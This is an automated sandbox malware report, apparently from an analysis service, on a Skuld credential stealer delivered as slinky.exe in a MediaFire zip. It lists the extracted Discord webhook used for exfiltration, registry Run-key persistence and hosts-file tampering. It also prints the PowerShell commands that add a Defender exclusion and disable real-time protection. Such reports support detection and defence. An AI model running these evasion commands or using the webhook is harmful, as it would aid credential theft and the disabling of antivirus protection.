skuld | hxxps://www[.]mediafire[.]com/file/9rri4eltf6gjko3/slinky_%25284%2529[.]zip/file

Analysis

max time kernel
85s
max time network
83s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
08-08-2024 05:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.mediafire.com/file/9rri4eltf6gjko3/slinky_%25284%2529.zip/file

Score

10^/10

skuld credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer

Malware Config

Extracted

Family

skuld

https://ptb.discord.com/api/webhooks/1267444280629133384/93lgPC5prxwm7kfEOYzZT9pM4aGa5M70dJhLbOvmKWx-H6EKIXoR_k1Z9HoM8VPO8jTA

Signatures

Skuld stealer
An info stealer written in Go lang.
stealer skuld
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

5464 powershell.exe
5160 powershell.exe

pid	process
5464	powershell.exe
5160	powershell.exe

Drops file in Drivers directory 3 IoCs

Processes:

attrib.exeslinky.exeattrib.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	slinky.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

slinky.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000\Software\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	slinky.exe

Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

55 api.ipify.org
170 api.ipify.org
47 ip-api.com

flow	ioc
55	api.ipify.org
170	api.ipify.org
47	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

slinky.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	slinky.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	slinky.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
discovery

Wi-Fi Discovery
T1016.002

Processes:

netsh.exe

pid process

5728 netsh.exe
Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

wmic.exewmic.exe

pid process

5128 wmic.exe
5572 wmic.exe

pid	process
5728	netsh.exe

pid	process
5128	wmic.exe
5572	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 171 Go-http-client/1.1
Modifies registry class 1 IoCs

Processes:

OpenWith.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings OpenWith.exe
NTFS ADS 1 IoCs

Processes:

msedge.exe

description ioc process

File opened for modification C:\Users\Admin\Downloads\slinky (4).zip:Zone.Identifier msedge.exe

description	flow	ioc
HTTP User-Agent header	171	Go-http-client/1.1

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings	OpenWith.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\slinky (4).zip:Zone.Identifier	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exeslinky.exepowershell.exepowershell.exe

pid	process
564	msedge.exe
564	msedge.exe
4216	msedge.exe
4216	msedge.exe
4472	identity_helper.exe
4472	identity_helper.exe
4692	msedge.exe
4692	msedge.exe
4708	msedge.exe
4708	msedge.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
5160	powershell.exe
5160	powershell.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
5160	powershell.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
5464	powershell.exe
5464	powershell.exe
4964	slinky.exe
4964	slinky.exe
5464	powershell.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe
4964	slinky.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs

Processes:

msedge.exe

pid	process
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

slinky.exewmic.exewmic.exe

description	pid	process
Token: SeDebugPrivilege	4964	slinky.exe
Token: SeIncreaseQuotaPrivilege	1936	wmic.exe
Token: SeSecurityPrivilege	1936	wmic.exe
Token: SeTakeOwnershipPrivilege	1936	wmic.exe
Token: SeLoadDriverPrivilege	1936	wmic.exe
Token: SeSystemProfilePrivilege	1936	wmic.exe
Token: SeSystemtimePrivilege	1936	wmic.exe
Token: SeProfSingleProcessPrivilege	1936	wmic.exe
Token: SeIncBasePriorityPrivilege	1936	wmic.exe
Token: SeCreatePagefilePrivilege	1936	wmic.exe
Token: SeBackupPrivilege	1936	wmic.exe
Token: SeRestorePrivilege	1936	wmic.exe
Token: SeShutdownPrivilege	1936	wmic.exe
Token: SeDebugPrivilege	1936	wmic.exe
Token: SeSystemEnvironmentPrivilege	1936	wmic.exe
Token: SeRemoteShutdownPrivilege	1936	wmic.exe
Token: SeUndockPrivilege	1936	wmic.exe
Token: SeManageVolumePrivilege	1936	wmic.exe
Token: 33	1936	wmic.exe
Token: 34	1936	wmic.exe
Token: 35	1936	wmic.exe
Token: 36	1936	wmic.exe
Token: SeIncreaseQuotaPrivilege	1936	wmic.exe
Token: SeSecurityPrivilege	1936	wmic.exe
Token: SeTakeOwnershipPrivilege	1936	wmic.exe
Token: SeLoadDriverPrivilege	1936	wmic.exe
Token: SeSystemProfilePrivilege	1936	wmic.exe
Token: SeSystemtimePrivilege	1936	wmic.exe
Token: SeProfSingleProcessPrivilege	1936	wmic.exe
Token: SeIncBasePriorityPrivilege	1936	wmic.exe
Token: SeCreatePagefilePrivilege	1936	wmic.exe
Token: SeBackupPrivilege	1936	wmic.exe
Token: SeRestorePrivilege	1936	wmic.exe
Token: SeShutdownPrivilege	1936	wmic.exe
Token: SeDebugPrivilege	1936	wmic.exe
Token: SeSystemEnvironmentPrivilege	1936	wmic.exe
Token: SeRemoteShutdownPrivilege	1936	wmic.exe
Token: SeUndockPrivilege	1936	wmic.exe
Token: SeManageVolumePrivilege	1936	wmic.exe
Token: 33	1936	wmic.exe
Token: 34	1936	wmic.exe
Token: 35	1936	wmic.exe
Token: 36	1936	wmic.exe
Token: SeIncreaseQuotaPrivilege	5128	wmic.exe
Token: SeSecurityPrivilege	5128	wmic.exe
Token: SeTakeOwnershipPrivilege	5128	wmic.exe
Token: SeLoadDriverPrivilege	5128	wmic.exe
Token: SeSystemProfilePrivilege	5128	wmic.exe
Token: SeSystemtimePrivilege	5128	wmic.exe
Token: SeProfSingleProcessPrivilege	5128	wmic.exe
Token: SeIncBasePriorityPrivilege	5128	wmic.exe
Token: SeCreatePagefilePrivilege	5128	wmic.exe
Token: SeBackupPrivilege	5128	wmic.exe
Token: SeRestorePrivilege	5128	wmic.exe
Token: SeShutdownPrivilege	5128	wmic.exe
Token: SeDebugPrivilege	5128	wmic.exe
Token: SeSystemEnvironmentPrivilege	5128	wmic.exe
Token: SeRemoteShutdownPrivilege	5128	wmic.exe
Token: SeUndockPrivilege	5128	wmic.exe
Token: SeManageVolumePrivilege	5128	wmic.exe
Token: 33	5128	wmic.exe
Token: 34	5128	wmic.exe
Token: 35	5128	wmic.exe
Token: 36	5128	wmic.exe

Suspicious use of FindShellTrayWindow 52 IoCs

Processes:

msedge.exe

pid	process
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

Processes:

msedge.exe

pid	process
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

OpenWith.exe

pid process

5288 OpenWith.exe

pid	process
5288	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 4216 wrote to memory of 4496	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 4496	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2788	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 564	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 564	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2712	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2712	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2712	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2712	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2712	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2712	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2712	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2712	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2712	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2712	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2712	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2712	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2712	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2712	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2712	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2712	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2712	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2712	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2712	4216	msedge.exe	msedge.exe
PID 4216 wrote to memory of 2712	4216	msedge.exe	msedge.exe

Views/modifies file attributes 1 TTPs 4 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exe

pid process

2888 attrib.exe
4980 attrib.exe
5692 attrib.exe
5712 attrib.exe

pid	process
2888	attrib.exe
4980	attrib.exe
5692	attrib.exe
5712	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/9rri4eltf6gjko3/slinky_%25284%2529.zip/file
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4216
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff80bd23cb8,0x7ff80bd23cc8,0x7ff80bd23cd8
  2⤵
  PID:4496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1892,17392275388369726227,16565413202712284853,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1904 /prefetch:2
  2⤵
  PID:2788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1892,17392275388369726227,16565413202712284853,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1892,17392275388369726227,16565413202712284853,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2768 /prefetch:8
  2⤵
  PID:2712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,17392275388369726227,16565413202712284853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
  2⤵
  PID:3644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,17392275388369726227,16565413202712284853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
  2⤵
  PID:1556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,17392275388369726227,16565413202712284853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
  2⤵
  PID:3752
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1892,17392275388369726227,16565413202712284853,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5908 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,17392275388369726227,16565413202712284853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5464 /prefetch:1
  2⤵
  PID:3340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,17392275388369726227,16565413202712284853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4464 /prefetch:1
  2⤵
  PID:1488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,17392275388369726227,16565413202712284853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:1
  2⤵
  PID:4912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,17392275388369726227,16565413202712284853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:1
  2⤵
  PID:4888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,17392275388369726227,16565413202712284853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6780 /prefetch:1
  2⤵
  PID:4244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,17392275388369726227,16565413202712284853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7012 /prefetch:1
  2⤵
  PID:4760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,17392275388369726227,16565413202712284853,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:1
  2⤵
  PID:2168
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,17392275388369726227,16565413202712284853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6668 /prefetch:1
  2⤵
  PID:3300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,17392275388369726227,16565413202712284853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
  2⤵
  PID:4696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,17392275388369726227,16565413202712284853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7416 /prefetch:1
  2⤵
  PID:2060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,17392275388369726227,16565413202712284853,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7444 /prefetch:1
  2⤵
  PID:3128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1892,17392275388369726227,16565413202712284853,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7136 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1892,17392275388369726227,16565413202712284853,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5112 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:4708

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4816

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4808

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5076

C:\Users\Admin\Downloads\slinky (4)\slinky (4)\slinky\slinky.exe
"C:\Users\Admin\Downloads\slinky (4)\slinky (4)\slinky\slinky.exe"
1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4964
- C:\Windows\system32\attrib.exe
  attrib +h +s "C:\Users\Admin\Downloads\slinky (4)\slinky (4)\slinky\slinky.exe"
  2⤵
  - Views/modifies file attributes
  PID:2888
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
  2⤵
  - Views/modifies file attributes
  PID:4980
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1936
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:5128
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads\slinky (4)\slinky (4)\slinky\slinky.exe"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5160
- C:\Windows\System32\Wbem\wmic.exe
  wmic os get Caption
  2⤵
  PID:5228
- C:\Windows\System32\Wbem\wmic.exe
  wmic cpu get Name
  2⤵
  PID:5384
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5464
